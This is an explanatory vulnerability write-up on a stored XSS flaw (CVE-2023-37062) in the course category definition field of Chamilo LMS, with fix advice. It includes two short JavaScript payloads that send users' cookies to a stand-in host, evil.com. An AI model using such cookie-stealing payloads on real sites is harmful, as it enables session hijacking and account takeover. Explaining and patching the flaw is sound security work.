CVE-2023-37062 - Cross-Site Scripting (XSS) Vulnerability in Chamilo LMS 1.11.x – How Attackers Can Abuse Admin Course Categories

Chamilo LMS is a popular open-source Learning Management System used by thousands of educational organizations worldwide. However, even trusted software can have flaws, and CVE-2023-37062 highlights a critical security issue. If you’re using Chamilo version 1.11.x up to 1.11.20, your system could be exposed to Cross-Site Scripting (XSS) attacks via course categories’ definitions—even if you thought only admins could change those.

Below, you’ll find all you need to know about this vulnerability, how it works, why it matters, an example exploit, and where to get more details.

What is CVE-2023-37062?

CVE-2023-37062 is a stored XSS vulnerability. It affects Chamilo 1.11.x up to 1.11.20. The problem is that administrators can inject malicious JavaScript code into course categories’ definitions, which is later executed in the browser of anyone viewing that category.

Why is it a problem if only admins can do this?

Ideally, you trust your admins. But:

Org-to-org reuse means your users might share logins.

Plus, XSS means users can have cookies stolen, sessions taken over, malware run, or browser-based attacks launched.

Where’s the flaw?

When an admin creates or edits a “course category” in Chamilo, there’s a field called “Definition.” Chamilo does not sanitize the HTML or JavaScript code entered into this field, so any script entered is stored in the database and shown to users as-is on the categories page.

Let’s see a simple code snippet an attacker might use

<script>
  alert('XSS via category definition!');
  // Or send cookies: new Image().src='https://evil.com/'+document.cookie
</script>

`

Visit the course categories list. The alert pops up.

This works because Chamilo saves and displays whatever you put in that field, without checking for scripts.

Exploit in the Wild

If a malicious admin (or someone who steals an admin password) does this and replaces the sample code with actual code to steal cookies or session tokens, they could take over any user who visits the page—including teachers, students, or even other admins.

Example payload to grab cookies

<script>
  fetch('https://evil.com/steal?c='+document.cookie);
</script>

How to Fix & Protect Your Site

Chamilo 1.11.21 and later should sanitize the input, fixing the XSS bug (see official security advisory).
If you’re on 1.11.20 or earlier, upgrade now.

Temporary workaround:
If you can’t upgrade, make sure only genuinely trusted people have admin.

Alternatively, filter or strip HTML from that field by editing the Chamilo code

// Example: in main/admin/course_category_add.php or similar
$definition = htmlspecialchars($_POST['definition'], ENT_QUOTES, 'UTF-8');

Original References

- Chamilo official advisory
- NVD listing for CVE-2023-37062
- Chamilo LMS download and changelog

Summary

CVE-2023-37062 lets Chamilo admins inject XSS through the course category definition, affecting all users who view those categories. This is serious for any school, university, or training provider using Chamilo. Patch your system, and keep an eye on privilege levels even among admins.

> Always keep your learning platform up to date!
> For more details, check the references above and stay secure.


*Security research and guide by ChatGPT. Please use responsibly and inform others if you use Chamilo LMS!*

Timeline

Published on: 07/07/2023 17:15:00 UTC
Last modified on: 07/12/2023 20:50:00 UTC